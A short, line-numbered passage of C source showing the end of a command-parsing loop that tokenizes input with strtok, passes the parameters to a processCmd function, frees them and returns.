3324.                                         pch = strtok(NULL, " ");
3325.                                 }
3326.                                 processCmd(paramsCount, params);
3327.                                 if(paramsCount > 1) {
3328.                                         int q = 1;
3329.                                         for(q = 1; q < paramsCount; q++) {
3330.                                                 free(params[q]);
3331.                                         }
3332.                                 }
3333.                         }
3334.                 }
3335.         }
3336.         return 0;
3337.     }
3338. }